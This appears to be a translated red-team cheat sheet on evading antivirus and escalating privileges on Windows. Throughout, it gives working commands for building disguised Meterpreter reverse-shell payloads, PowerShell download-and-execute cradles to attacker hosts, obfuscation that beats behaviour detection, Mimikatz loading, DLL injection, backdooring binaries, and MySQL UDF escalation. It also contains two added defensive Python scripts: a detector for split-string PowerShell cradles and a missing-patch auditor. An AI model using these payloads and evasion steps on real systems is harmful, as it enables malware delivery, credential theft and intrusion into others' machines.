          import py2exe

          setup(
              name = "Meter",
              description = "Python-based App",
              version = "1.0",
              console = ["shell.py"],
              options = {"py2exe": {"bundle_files": 1, "packages": "ctypes", "includes": "base64,sys,socket,struct,time,code,platform,getpass,shutil"}},
              zipfile = None
          )

          Run the packaging command:
          >python setup.py py2exe
          A dist folder is created in the current directory; the packaged exe is inside.

          Base64 encoding + pyinstaller packaging

          The MSF listener needs automatic process migration: set autorunscript migrate -n explorer.exe
          >msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
          Paste the shellcode into shellcode+base64+c.py and package it:
          >python pyinstaller-script.py -F -w shellcode.py
          A dist folder is created in the directory; the exe is inside.

          Separated loader

          hex
          Generate a C-format payload:
          >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
          Download k8final and paste the shellcode into it.
          Use https://github.com/k8gege/scrun
          either >python scrun.py xxx, or compile ScRunHex.py to an exe.

          Base64 (*)
          Generate a C-format payload:
          >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
          Download k8final and paste the shellcode into it.
          Hex-encode it, paste it in, then base64-encode it.
          Compile ScRunBase.py for the system's bitness, package it as an exe with pyinstaller and run it: https://gitee.com/RichChigga/scrun/blob/master/ScRunBase64.py
          >python pyinstaller-script.py -F -w ScRunBase64.py


          DLL hijacking

          White DLL hijacking: use Process Monitor to find the DLLs a program loads, then use stud_pe to add a DLL to it, or generate a payload, make it evade AV and paste it in. Check what software is on the target, find a hijackable DLL locally, prepare the hijacked file and upload it.

          MSBuild

          Link: https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml
          >msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f csharp
          Remote execution:
          >wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
          Automatic process migration must be set on the listener.

          GreatSCT

          >use Bypass
          >list
          >use regasm/meterpreter/rev_tcp.py
          >msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

          Mshta

          https://github.com/mdsecactivebreach/CACTUSTORCH/blob/master/CACTUSTORCH.hta
          Generate:
          >msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.bin
          >cat 1.bin |base64 -w 0
          Copy the encoded output into the hta
          Run:
          >mshta http://192.168.0.106:1222/1.hta
          360 detects it at execution time, but its static and dynamic scans do not; Huorong does not detect it.

          InstallUtil

          Covered in the internal-network article.

          Veil

          >use 1                choose the evasion module
          >list                 list the available payloads
          >use 7                choose the C-format payload
          >set LHOST/LPORT      set the callback IP and port
          >generate             generate
          The exe generated directly may be detected; currently it gets past 360 but not Huorong. Compile the C file with MinGW-w64 instead:
          >gcc -o vel.exe veil.c -l ws2_32

          RC4

          >msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 lhost=192.168.0.108 lport=3333 RC4PASSWORD=123qwe!@# -f c

          Binding to an existing executable

          >msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -x PsExec64.exe  -i 15 -f exe -o /var/www/html/payload4.exe

          Evasion modules

          >show evasion

          Phantom-Evasion


          Shellter

          32-bit programs only.
          >apt install shellter
          Specify an exe file, then choose a payload.

          the-backdoor-factory

          Check whether the file supports binding:
          >python backdoor.py -f /root/Desktop/putty.exe -S
          Check which payloads the file supports:
          >python backdoor.py -f /root/Desktop/putty.exe -s show
          reverse_shell_tcp_inline              corresponds to msf: set payload windows/meterpreter/reverse_tcp
          meterpreter_reverse_https_threaded    corresponds to msf: set payload windows/meterpreter/reverse_https
          iat_reverse_tcp_stager_threaded       repairs the IAT
          user_supplied_shellcode_threaded      custom payload
          Options:
          -s    payload
          -H    callback address
          -P    callback port
          -J    multiple code-cave injection
          >python backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.108 -P 12138 -J -o payload.exe
          The backdoored file is written to the backdoored directory.
          Or generate a payload:
          msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c
          Custom shellcode:
          >python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c -o payload2.exe

          zirikatu

          hanzoInjection

          https://github.com/P0cL4bs/hanzoInjection
          Generate:
          >msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f raw -o /var/www/html/1.bin
          >HanzoInjection.exe -p 1.bin -o 1.cs
          Compile 1.cs (Properties -> Build -> Allow unsafe code).

          PowerShell AV evasion

          Generate directly

          >msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.0.108 lport=12138 -f psh -o /var/www/html/1.ps1
          Run:
          >powershell -ep bypass -noexit -file 1.ps1
          PowerShell behaviour-detection bypass:
          >powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.replace('123','adString');IEX ($c1+$c2)"

          Loading with Invoke-Shellcode

          Generate the code:
          >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f powershell -o /var/www/html/1.ps1
          Run on the target:
          > powershell -ep bypass
          > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/powersploit/CodeExecution/Invoke-Shellcode.ps1')
          > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/1.ps1')
          > Invoke-Shellcode -Shellcode ($buf) -Force

          The security software did not react.

          Invoke-Obfuscation

          https://github.com/danielbohannon/Invoke-Obfuscation
          Generate the code:
          >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f psh -o /var/www/html/1.ps1
          >powershell -ep bypass
          >Import-Module .\Invoke-Obfuscation.psd1
          >Invoke-Obfuscation
          >set scriptpath C:\Users\y\Desktop\1.ps1
          >encoding
          >3                                  choose the encoding method
          >out C:\Users\y\Desktop\ok.ps1      save

          Run:
          >powershell -ep bypass -noexit -file ok.ps1



          Xencrypt

          https://github.com/the-xentropy/xencrypt/blob/master/xencrypt.ps1
          >Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -outfile xenmimi.ps1 -Iterations 100      recursive layering to evade dynamic detection
          >Invoke-Xencrypt -infile .\Invoke-Mimikatz.ps1 -outfile mimi.ps1


          PyFuscation

          https://github.com/CBHue/PyFuscation
          Obfuscates functions, parameters and variables:
          >python3 PyFuscation.py -fvp --ps Invoke-Mimikatz.ps1


          Split string + C compilation

          #include <stdio.h>
          #include <stdlib.h>
          int main()
          {
              system("powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)");
              return 0;
          }

          Behaviour-detection bypass

          >powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

          Out-EncryptedScript

          http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1
          >Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password shabiisme -Salt 123456

          PS > IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1")
          PS > [String] $cmd = Get-Content .\evil.ps1
          PS > Invoke-Expression $cmd
          PS > $decrypted = de shabiisme 123456
          PS > Invoke-Expression $decrypted
          PS > Invoke-Mimikatz

          Cobalt Strike PowerShell AV evasion

          From: https://y4er.com/post/cobalt-strike-powershell-bypass/
          powershell>$string = ''
          powershell>$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('[shellcode generated by CS]')
          powershell>$s |foreach { $string = $string + $_.ToString()+','}
          powershell>$string>c:\1.txt
          Modify the PS script: [Byte[]]$var_code = [Byte[]](payload)
          Then obfuscate the function and variable names.
          To get past blocking of the command execution, use CS argument spoofing: beacon > argue cmd.exe blablabla

          Chunked AV evasion

          Generate:
          msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.0.108 LPORT=443 -f psh-net -o shity_shellcode.ps1
          First a test: replace the shellcode in the ps1 file with a harmless string.

          The result: it is still detected.
          This shows that most of the detection targets the PowerShell template rather than the shellcode itself. Several bypass methods:
          1. Split the strings into several parts and create intermediate variables;
          2. Add lots of junk comments;
          3. Add some junk instructions such as loops or sleeps (useful against sandboxes).
          [DllImport("kernel32.dll")] becomes [DllImport("ke"+"rne"+"l32.dll")]    # gets past Symantec
          $przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location)) becomes $magic="Syst"+"em"+".dll";$przdE.ReferencedAssemblies.AddRange(@($magic,[PsObject].Assembly.Location))
          Split the shellcode: $sc0=<part 1 of the shellcode>; … $sc7=<part 8 of the shellcode>; [Byte[]]$tcomplete_sc=[System.Convert]::FromBase64String($sc0+$sc1+…+$sc7)
          Some of the details can be found in https://raw.githubusercontent.com/kmkz/Pentesting/master/AV_Evasion/AV_Bypass.ps1
          I do not know assembly well, so I did not add harmless instructions. Here I use the one-click bash script directly; those with time can read the commands inside it: https://github.com/darksh3llRU/tools/blob/master/psh-net_shellcode_fastchange.sh
          The script generates an hta and splits into chunks of 1337 characters.
          In my testing the 1337-character chunks were detected by Symantec, so I changed it to chunks of 250 characters.
          Because I added no assembly instructions, just press any key to skip this step; those who know can add some instructions at the start, for example xor, inc, dec, add, sub, mov, nop.
          After it finishes, several files are generated.
          We only use final_pshnet_revhttps.ps1; open it and modify it.
          Change it to



          Ruby

          When the target machine has Ruby installed, generate:
          >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f ruby
          Paste it into a Ruby file and run:
          >ruby xx.ruby

          Golang

          Generate:
          >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c
          Convert the code to 0x format, paste it into go.txt and save it as a .go file.
          Install the Go environment and run >go build in the shellcode directory to produce the exe.

          Loaders

          go-shellcode

          https://github.com/brimstone/go-shellcode
          Enter the cmd/sc directory and build sc.exe:
          >go build
          Generate:
          >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f hex -o shell.txt
          Load the shellcode with the loader:
          >sc.exe shellcode

          Gsl

          https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip
          >gsl -s SHELLCODE -hex                 msf-generated hex format
          >gsl -f shell.raw                      load a raw-format file locally
          >gsl -f shell.hex -hex                 load a hex-format file locally
          >gsl -u http://192.168.0.108/1.raw     remote load
          >gsl -u http://192.168.0.108/1.hex

          Internal network & domain

          Powershell

          Check the version: $PSVersionTable

          Remote execution

          >powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('');Invoke-xxx"

          Loading an exe

          Generate an exe trojan with msfvenom:
          #msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f exe > /var/www/html/1.exe
          Use the Invoke-ReflectivePEInjection.ps1 script from PowerSploit:
          #powershell.exe -w hidden -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/clymberps/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.0.107/1.exe -ForceASLR"

          EXE2PS1

          http://192.168.0.107/ps/powersploit/CodeExecution/Convert-BinaryToString.ps1
          Convert the exe to base64:
          >Import-Module .\Convert-BinaryToString.ps1
          >Convert-BinaryToString -FilePath .\ms15051.exe
          http://192.168.0.107/ps/powersploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
          Add the following at the top of Invoke-ReflectivePEInjection.ps1:

          Function MS15051
          {
          <#
          .SYNOPSIS

          .EXAMPLE
          C:\PS> MS15051 -Command "whoami"
          #>
              [CmdletBinding()]
              param(
                  [Parameter(Mandatory = $False)]
                  [string]
                  $Command
              )
              $InputString = "<base64 encoding of the file>"
              $PEBytes = [System.Convert]::FromBase64String($InputString)

          And the following at the end of the file:

              write-host ("[+] Executing Command: "+$Command) -foregroundcolor "Green"
              Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs $Command
              write-host ("[+] Done !") -foregroundcolor "Green"
          }

          Download and run it remotely:
          >powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powersploit/CodeExecution/ms15051.ps1'); MS15051 -Command \"whoami\""

          Bypassing the execution policy

          >powershell Set-ExecutionPolicy Unrestricted      needs administrator rights; unrestricted execution
          >powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/Invoke-xxx.ps1');invoke-xxx"
          >powershell -exec bypass -File ./a.ps1
          &
          >Import-Module xxx

          Base64

          >use exploit/multi/script/web_delivery    target=2 (PSH)
          &
          >cat payload.txt | iconv --to-code UTF-16LE | base64
          >powershell -ep bypass -enc base64code

          Bypass by writing a bat file

          Save the command powershell -exec bypass -File ./a.ps1 as c.bat

          Splitting and concatenating strings

          powershell.exe "$c1='powershell -c IEX';$c2='(New-Object Net.WebClient).Downlo';$c3='adString("http://192.168.197.192/a.ps1")';echo ($c1,$c2,$c3)"
          Split the command into strings first, then concatenate them; change echo to IEX to execute it.
          powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)

          The replace function

          powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.replace('123','adString');IEX ($c1+$c2)"

          Bypass by splitting the http string

          The http string itself can also be split, which bypasses in the same way:
          powershell "$a='IEX((new-object net.webclient).downloadstring("ht';$b='tp://192.168.197.192/a.ps1"))';IEX ($a+$b)"
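Every variant in the bypass sections above (the split string, the .replace() placeholder, the split http scheme, and the repeated -w Normal switches in the behaviour-detection bypass) works by keeping the strings a naive rule looks for out of the raw command line. The following is an added defensive example written for this page, not code from the original notes: it rebuilds the string the interpreter will actually see by concatenating the single-quoted literals and applying literal .replace() calls, and flags a cradle that only becomes visible after that reassembly. All sample command lines are constructed from the variants quoted on this page; the thresholds and rule names are assumptions.

```python
import re

# Constructed sample command lines (not captured from a real host), modelled on the
# variants listed on this page, plus one benign administrative command for contrast.
SAMPLES = {
    # direct download cradle
    "plain": "powershell -nop -w hidden -ep bypass \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-xxx.ps1');Invoke-xxx\"",
    # 'DownloadString' split across two variables and re-joined
    "split": "powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)",
    # placeholder token restored with .replace()
    "replace": "powershell -noexit \"$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.replace('123','adString');IEX ($c1+$c2)\"",
    # the scheme itself split so 'http://' never appears contiguously
    "http_split": "powershell \"$a='IEX((new-object net.webclient).downloadstring(\"ht';$b='tp://192.168.197.192/a.ps1\"))';IEX ($a+$b)\"",
    # dozens of repeated -w Normal switches padding the command line
    "flag_flood": "powershell.exe " + "-w Normal " * 48 + "\"IEX(New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1');Invoke-Foo\"",
    # ordinary administrative use
    "benign": "powershell -NoProfile -Command \"Get-ChildItem C:\\Windows\\Temp | Measure-Object\"",
}

SQ_LITERAL = re.compile(r"'((?:[^']|'')*)'")        # PowerShell single-quoted string; '' escapes a quote
REPLACE_CALL = re.compile(r"\.replace\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.IGNORECASE)
WINDOW_FLAG = re.compile(r"-w(?:indowstyle)?\s+\w+", re.IGNORECASE)
DOWNLOAD_CALLS = ("downloadstring", "downloadfile", "downloaddata")
INVOKE_FORMS = ("iex", "invoke-expression")
FLAG_FLOOD_THRESHOLD = 3                             # assumption: more than this many -w switches is abnormal


def assemble_literals(cmd):
    """Concatenate every single-quoted literal in order, then apply any literal
    .replace('old','new') calls found in the command. This approximates what the
    interpreter sees after $a+$b / -join / .replace() have run."""
    parts = [m.group(1).replace("''", "'") for m in SQ_LITERAL.finditer(cmd)]
    assembled = "".join(parts)
    for old, new in REPLACE_CALL.findall(cmd):
        assembled = assembled.replace(old, new)
    return assembled


def _has_download(text):
    return any(call in text for call in DOWNLOAD_CALLS)


def _has_url(text):
    return "http://" in text or "https://" in text


def analyse(cmd):
    """Return a dict of indicators for one command line; 'suspicious' is the verdict."""
    raw = cmd.lower()
    assembled = assemble_literals(cmd).lower()
    both = raw + "\n" + assembled
    findings = {
        "download_call": _has_download(both),
        "invoke": any(form in both for form in INVOKE_FORMS),
        "url": _has_url(both),
        # the tell-tale of string splitting: the indicator exists only after reassembly
        "hidden_by_assembly": (_has_download(assembled) and not _has_download(raw))
                              or (_has_url(assembled) and not _has_url(raw)),
        "replace_trick": REPLACE_CALL.search(cmd) is not None,
        "flag_flood": len(WINDOW_FLAG.findall(cmd)) > FLAG_FLOOD_THRESHOLD,
    }
    findings["suspicious"] = (
        (findings["download_call"] and (findings["invoke"] or findings["url"]))
        or findings["hidden_by_assembly"]
        or findings["flag_flood"]
    )
    return findings


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        f = analyse(cmd)
        flags = ", ".join(k for k, v in f.items() if v and k != "suspicious") or "-"
        print(f"{name:<11} suspicious={f['suspicious']!s:<5} {flags}")
```

The reassembly step is deliberately simple (it ignores double-quoted literals and variable order), which is enough to catch every variant on this page; a production rule would normally pair it with Script Block Logging (event 4104), where the de-obfuscated script is recorded by PowerShell itself.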

          Image-based evasion

          Invoke-PSImage.ps1 runs a PowerShell script through an image: the payload is scattered across the image's pixels, and at execution time on the remote end the pixels are walked again to reassemble the payload and run it.
          https://github.com/peewpw/Invoke-PSImage
          A 1900*1200 image x.jpg.
          C:\>powershell
          PS C:\> Import-Module .\Invoke-PSImage.ps1
          PS C:\> Invoke-PSImage -script .\a.ps1 -Image .\x.jpg -Out .\reverse_shell.png -Web
          a.ps1 is the msf trojan; -Out writes the reverse_shell.png image; -Web outputs the command that reads it from the web. Move reverse_shell.png to the web directory, replace the URL, and run the command under PowerShell.

          Loading shellcode

          Generate the script trojan with msfvenom:
          #msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.72.164 LPORT=4444 -f powershell -o /var/www/html/test
          On the Windows target run the following:
          PS >IEX(New-Object Net.WebClient).DownloadString("http://144.34.xx.xx/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")
          PS >IEX(New-Object Net.WebClient).DownloadString("http://192.168.72.164/test")
          Invoke-Shellcode -Shellcode $buf -Force
          Running the trojan's shellcode through the Invoke-Shellcode.ps1 script gives a meterpreter shell back.

          Loading a DLL

          Generate a DLL trojan with msfvenom:
          >msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.164 lport=4444 -f dll -o /var/www/html/test.dll
          Upload the generated DLL to the target's C: drive, then run the following on the target:
          PS >IEX(New-Object Net.WebClient).DownloadString("http://144.34.xx.xx/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")
          Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden      start a new notepad process, hidden
          Invoke-DllInjection -ProcessID xxx -Dll c:\test.dll                     use the PID of notepad
          Msf:
          #use exploit/multi/handler
          #set payload windows/x64/meterpreter/reverse_tcp
          #run

          Windows security identifiers (SIDs)

          RID    Description
          500    Administrator
          501    Guest
          502    Service account of the Key Distribution Center service
          512    Domain Admins
          513    Domain Users
          514    Domain Guests
          515    Domain Computers
          516    Domain Controllers
          544    Builtin Administrators
          519    Enterprise Admins

          Privilege escalation

          Impacket toolkit

          https://github.com/maaaaz/impacket-examples-windows
          https://github.com/SecureAuthCorp/impacket
          #git clone https://github.com/CoreSecurity/impacket.git
          #cd impacket/
          #python setup.py install

          Windows-exploit-suggester

          #pip install xlrd --upgrade
          #./windows-exploit-suggester.py --update
          #./windows-exploit-suggester.py --database 20xx-xx-xx-mssb.xlsx --systeminfo systeminfo.txt

          Wesng

          https://github.com/bitsadmin/wesng
          >systeminfo >1.txt
          >python wes.py 1.txt

          Searchsploit

          Usage:
          >searchsploit <software> <version>
          Sites for looking up common patches:
          https://bugs.hacking8.com/tiquan/
          http://get-av.se7ensec.cn/index.php
          https://patchchecker.com/checkprivs/
          Query the installed patches with wmic:
          wmic qfe list full|findstr /i hotfix
          systeminfo>temp.txt&(for %i in (KB2271195 KB2124261 KB2160329 KB2621440 KB2707511 KB2829361 KB2864063 KB3000061 KB3045171 KB3036220 KB3077657 KB3079904 KB3134228 KB3124280 KB3199135) do @type temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a temp.txt
          Bulletin, patch and affected versions:
          MS17-017 [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)
          CVE-2017-8464 [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008)
          CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
          MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
          MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
          MS16-111 [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)
          MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)
          MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
          MS16-034 [KB3143145] [Kernel Driver] (2008/7/8/10/2012)
          MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
          MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)
          MS15-097 [KB3089656] [remote code execution] (win8.1/2012)
          MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012)
          MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)
          MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012)
          MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012)
          MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8)
          MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
          MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8)
          MS14-070 [KB2989935] [Kernel Driver] (2003)
          MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8)
          MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)
          MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8)
          MS14-002 [KB2914368] [NDProxy] (2003/XP)
          MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)
          MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)
          MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8)
          MS12-042 [KB2972621] [Service Bus] (2008/2012/win7)
          MS12-020 [KB2671387] [RDP] (2003/2008/7/XP)
          MS11-080 [KB2592799] [AFD.sys] (2003/XP)
          MS11-062 [KB2566454] [NDISTAPI] (2003/XP)
          MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP)
          MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista)
          MS10-092 [KB2305420] [Task Scheduler] (2008/7)
          MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5)
          MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista)
          MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
          MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP)
          MS10-012 [KB971468] [SMB Client Trans2 stack overflow] (Windows 7/2008R2)
          MS09-050 [KB975517] [Remote Code Execution] (2008/Vista)
          MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0)
          MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista)
          MS08-068 [KB957097] [Remote Code Execution] (2000/XP)
          MS08-067 [KB958644] [Remote Code Execution] (Windows 2000/XP/Server 2003/Vista/Server 2008)
          MS08-066 [] [] (Windows 2000/XP/Server 2003)
          MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista)
          MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000)
          MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003)
          MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
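The same patch check is just as useful on the defending side as a quick compliance audit of a saved systeminfo dump. The following is an added example written for this page, not code from the original notes: it parses the KB tokens out of systeminfo output and reports which of the KB numbers from the cmd one-liner above are absent, annotating each with the bulletin id where the list above gives one. The systeminfo excerpt is constructed, and the bulletin mapping is limited to pairs that appear on this page (None where the page lists the KB without a bulletin).

```python
import re

# KB numbers from the systeminfo one-liner above, with the bulletin id where the
# page's own list gives one and None where it does not.
WATCHED_KBS = {
    "KB2271195": None, "KB2124261": None, "KB2160329": "MS10-048", "KB2621440": None,
    "KB2707511": None, "KB2829361": None, "KB2864063": None, "KB3000061": "MS14-058",
    "KB3045171": None, "KB3036220": "MS15-010", "KB3077657": "MS15-077", "KB3079904": None,
    "KB3134228": None, "KB3124280": None, "KB3199135": "MS16-135",
}

# Constructed systeminfo excerpt (not from a real host); only the Hotfix(s) section matters.
SAMPLE_SYSTEMINFO = """\
Host Name:                 LAB-WIN7
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB3000061
                           [02]: KB3124280
                           [03]: KB3199135
Network Card(s):           1 NIC(s) Installed.
"""

KB_TOKEN = re.compile(r"\bKB\d{6,7}\b", re.IGNORECASE)


def installed_hotfixes(systeminfo_text):
    """Every KBnnnnnn token in the output, normalised to upper case. Matching the
    token instead of the localised 'Hotfix(s):' label keeps this language-independent."""
    return {m.group(0).upper() for m in KB_TOKEN.finditer(systeminfo_text)}


def missing_hotfixes(systeminfo_text, watched=WATCHED_KBS):
    """[(kb, bulletin_or_None), ...] for watched KBs absent from the host, sorted by KB."""
    present = installed_hotfixes(systeminfo_text)
    return sorted((kb, bulletin) for kb, bulletin in watched.items() if kb not in present)


def report(systeminfo_text):
    """One line per missing KB, in the same spirit as the '%i Not Installed!' echo above."""
    lines = []
    for kb, bulletin in missing_hotfixes(systeminfo_text):
        lines.append(f"{kb} not installed" + (f" ({bulletin})" if bulletin else ""))
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_SYSTEMINFO)))
```

A missing KB from this list only means the superseding cumulative update has to be confirmed by other means (wesng and windows-exploit-suggester above do that supersedence lookup); the script is a first-pass filter, not a verdict.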

          Enabling the guest account

          >net user guest /active:yes

          MYSQL udf

          UDF: sqlmap-master\udf\mysql\windows\
          >python sqlmap/extra/cloak/cloak.py lib_mysqludf_sys.dll _
          MySQL > 5.1: udf.dll goes in lib\plugin
          MySQL < 5.1: udf.dll goes in c:\windows\system32
          Check the system version and the plugin directory:
          #show variables like '%compile%';
          #select @@plugin_dir
          Write the UDF into place:
          #select load_file('\\\\192.168.0.19\\network\\lib_mysqludf_sys_64.dll') into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";
          Or hex-encode the UDF and write it:
          #select hex(load_file('udf_sys_64.dll')) into dumpfile '/tmp/udf.hex';
          #select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000… into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";
          Or base64-encode the UDF and write it (MySQL 5.6.1 and MariaDB 10.0.5):
          #select to_base64(load_file('/usr/udf.dll')) into dumpfile '/tmp/udf.b64';
          #select from_base64("xxxxx") into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";
          Or create a table and concatenate the hex-encoded chunks:
          #create table temp(data longblob);
          #insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d);
          #update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b3);
          #select data from temp into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";
          Or:
          #insert into temp(data) values(hex(load_file('D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll')));
          #select unhex(cmd) FROM mysql.temp INTO DUMPFILE 'D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll ';
          Or use a fast data import:
